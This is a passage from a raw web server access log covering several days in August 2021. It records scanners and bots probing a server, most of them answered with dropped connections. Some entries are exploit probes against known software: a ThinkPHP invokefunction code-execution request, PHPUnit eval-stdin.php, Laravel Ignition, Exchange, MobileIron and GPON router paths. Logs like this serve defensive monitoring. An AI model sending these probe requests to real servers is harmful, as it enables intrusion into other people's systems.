Gecko / 20100101 Firefox / 62.0" "-" [17/Aug/2021:20:45:41 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [17/Aug/2021:20:45:41 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [17/Aug/2021:21:01:08 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 185.222.59.20] [Length 0] [Gzip -] "curl/7.3.2" "-" [17/Aug/2021:22:31:23 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.219.203] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Aug/2021:22:37:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Aug/2021:22:44:26 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.218.217] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Aug/2021:23:04:35 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 54.219.175.24] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [17/Aug/2021:23:07:50 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.198.82] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Aug/2021:00:56:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 180.149.125.175] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" [18/Aug/2021:01:56:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.215.70] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Aug/2021:02:09:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.56.80.65] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [18/Aug/2021:02:09:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.161] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [18/Aug/2021:02:09:58 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 89.44.9.37] [Length 0] [Gzip -] "-" "-" [18/Aug/2021:02:09:59 +0000] 400 - - https localhost "-" [Client 89.44.9.37] [Length 154] [Gzip -] "-" "-" [18/Aug/2021:02:09:59 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 23.129.64.161] [Length 0] [Gzip -] "-" "-" [18/Aug/2021:02:10:00 +0000] 400 - - https localhost "-" [Client 193.189.100.197] [Length 154] [Gzip -] "-" "-" [18/Aug/2021:02:10:00 +0000] 444 - OPTIONS https localhost "/" [Client 89.44.9.37] [Length 0] [Gzip -] "-" "-" [18/Aug/2021:02:10:02 +0000] 444 - OPTIONS https localhost "/" [Client 185.247.225.73] [Length 0] [Gzip -] "-" "-" [18/Aug/2021:02:40:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.120.14.41] [Length 0] [Gzip -] "-" "-" [18/Aug/2021:02:40:36 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.41] [Length 252] [Gzip -] "-" "-" [18/Aug/2021:02:40:36 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.41] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [18/Aug/2021:04:57:28 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 181.214.206.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36" "-" [18/Aug/2021:05:02:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.82.47.5] [Length 0] [Gzip -] "-" "-" [18/Aug/2021:06:28:30 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 185.222.59.20] [Length 0] [Gzip -] "curl/7.3.2" "-" [18/Aug/2021:07:19:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [18/Aug/2021:07:30:56 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [18/Aug/2021:07:50:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 104.140.188.34] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [18/Aug/2021:08:41:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.142.236.40] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [18/Aug/2021:08:41:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.142.236.40] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [18/Aug/2021:08:41:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.142.236.40] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [18/Aug/2021:08:42:10 +0000] 400 - - https localhost "-" [Client 185.142.236.40] [Length 0] [Gzip -] "-" "-" [18/Aug/2021:08:42:11 +0000] 400 - - https localhost "-" [Client 185.142.236.40] [Length 0] [Gzip -] "-" "-" [18/Aug/2021:08:42:12 +0000] 400 - - https localhost "-" [Client 185.142.236.40] [Length 0] [Gzip -] "-" "-" [18/Aug/2021:08:42:17 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 185.142.236.40] [Length 0] [Gzip -] "-" "-" [18/Aug/2021:08:42:18 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 185.142.236.40] [Length 0] [Gzip -] "-" "-" [18/Aug/2021:08:42:19 +0000] 444 - GET https 64.22.31.253 "/.well-known/security.txt" [Client 185.142.236.40] [Length 0] [Gzip -] "-" "-" [18/Aug/2021:08:42:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.79.107.251] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [18/Aug/2021:09:35:16 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Aug/2021:09:35:16 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Aug/2021:09:35:18 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Aug/2021:09:35:19 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Aug/2021:09:35:20 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [18/Aug/2021:09:35:20 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Aug/2021:09:35:22 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Aug/2021:09:35:22 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Aug/2021:09:35:25 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Aug/2021:09:35:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Aug/2021:09:35:28 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Aug/2021:10:15:20 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.204.136] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Aug/2021:12:56:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.83.64.43] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [18/Aug/2021:13:52:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.194] [Length 0] [Gzip -] "-" "-" [18/Aug/2021:13:52:39 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.194] [Length 252] [Gzip -] "-" "-" [18/Aug/2021:13:52:39 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.194] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [18/Aug/2021:16:52:18 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.217.122] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Aug/2021:17:04:22 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.200.167] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Aug/2021:17:15:40 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.218.219] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Aug/2021:17:35:19 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 185.222.59.20] [Length 0] [Gzip -] "curl/7.3.2" "-" [18/Aug/2021:17:54:02 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [18/Aug/2021:18:51:36 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.201.142] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Aug/2021:21:08:00 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Aug/2021:21:08:00 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Aug/2021:21:08:00 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Aug/2021:21:08:00 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Aug/2021:21:08:00 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Aug/2021:21:08:00 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Aug/2021:23:09:50 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.219.124] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Aug/2021:23:38:10 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Aug/2021:23:38:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Aug/2021:23:38:13 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Aug/2021:23:38:14 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Aug/2021:23:38:16 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Aug/2021:23:38:17 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [18/Aug/2021:23:38:19 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Aug/2021:23:38:20 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Aug/2021:23:38:23 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Aug/2021:23:38:24 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Aug/2021:23:38:26 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Aug/2021:00:11:47 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [19/Aug/2021:00:12:17 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [19/Aug/2021:00:12:18 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [19/Aug/2021:00:12:18 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [19/Aug/2021:01:02:28 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [19/Aug/2021:03:11:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.195.35] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Aug/2021:04:22:28 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [19/Aug/2021:04:22:29 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [19/Aug/2021:04:22:29 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [19/Aug/2021:05:06:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.32] [Length 0] [Gzip -] "-" "-" [19/Aug/2021:05:34:30 +0000] 400 - - http localhost "-" [Client 76.72.172.167] [Length 154] [Gzip -] "-" "-" [19/Aug/2021:05:34:30 +0000] 400 - - http localhost "-" [Client 76.72.172.167] [Length 154] [Gzip -] "-" "-" [19/Aug/2021:05:34:30 +0000] 400 - - https localhost "-" [Client 76.72.172.167] [Length 0] [Gzip -] "-" "-" [19/Aug/2021:06:08:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 49.51.97.61] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [19/Aug/2021:06:08:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 49.51.97.61] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [19/Aug/2021:06:18:46 +0000] 400 - - http localhost "-" [Client 49.51.97.61] [Length 154] [Gzip -] "-" "-" [19/Aug/2021:07:43:38 +0000] 400 - HEAD http localhost "/" [Client 178.62.127.201] [Length 0] [Gzip -] "-" "-" [19/Aug/2021:07:43:38 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 178.62.127.201] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [19/Aug/2021:07:43:39 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 178.62.127.201] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [19/Aug/2021:07:43:39 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 178.62.127.201] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [19/Aug/2021:07:43:39 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 178.62.127.201] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [19/Aug/2021:07:43:39 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 178.62.127.201] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [19/Aug/2021:07:43:40 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 178.62.127.201] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [19/Aug/2021:07:43:40 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 178.62.127.201] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [19/Aug/2021:07:43:40 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 178.62.127.201] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [19/Aug/2021:07:43:40 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 178.62.127.201] [Length 252] [Gzip -] "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9" "-" [19/Aug/2021:07:43:41 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 178.62.127.201] [Length 0] [Gzip -] "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9" "-" [19/Aug/2021:07:43:41 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 178.62.127.201] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [19/Aug/2021:07:43:41 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 178.62.127.201] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [19/Aug/2021:07:49:19 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [19/Aug/2021:08:20:57 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 185.222.59.20] [Length 0] [Gzip -] "curl/7.3.2" "-" [19/Aug/2021:10:07:09 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Aug/2021:10:07:10 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Aug/2021:10:21:26 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.199.200] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Aug/2021:10:32:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.116] [Length 0] [Gzip -] "-" "-" [19/Aug/2021:10:32:35 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.116] [Length 252] [Gzip -] "-" "-" [19/Aug/2021:10:32:35 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.116] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [19/Aug/2021:11:27:58 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [19/Aug/2021:11:30:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.120.14.113] [Length 0] [Gzip -] "-" "-" [19/Aug/2021:11:30:47 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.113] [Length 252] [Gzip -] "-" "-" [19/Aug/2021:11:30:47 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.113] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [19/Aug/2021:12:21:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.79.68.246] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [19/Aug/2021:13:05:47 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 198.199.105.91] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Aug/2021:13:47:53 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Aug/2021:13:47:54 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Aug/2021:14:14:58 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Aug/2021:14:14:58 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Aug/2021:15:09:03 +0000] 444 - GET https 64.22.31.253 "//a2billing/customer/templates/default/footer.tpl" [Client 185.40.4.163] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.36.2.el7.x86_64" "-" [19/Aug/2021:15:22:51 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Aug/2021:15:22:51 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Aug/2021:15:22:54 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Aug/2021:15:22:54 +0000] 444 - POST https 64.22.31.253 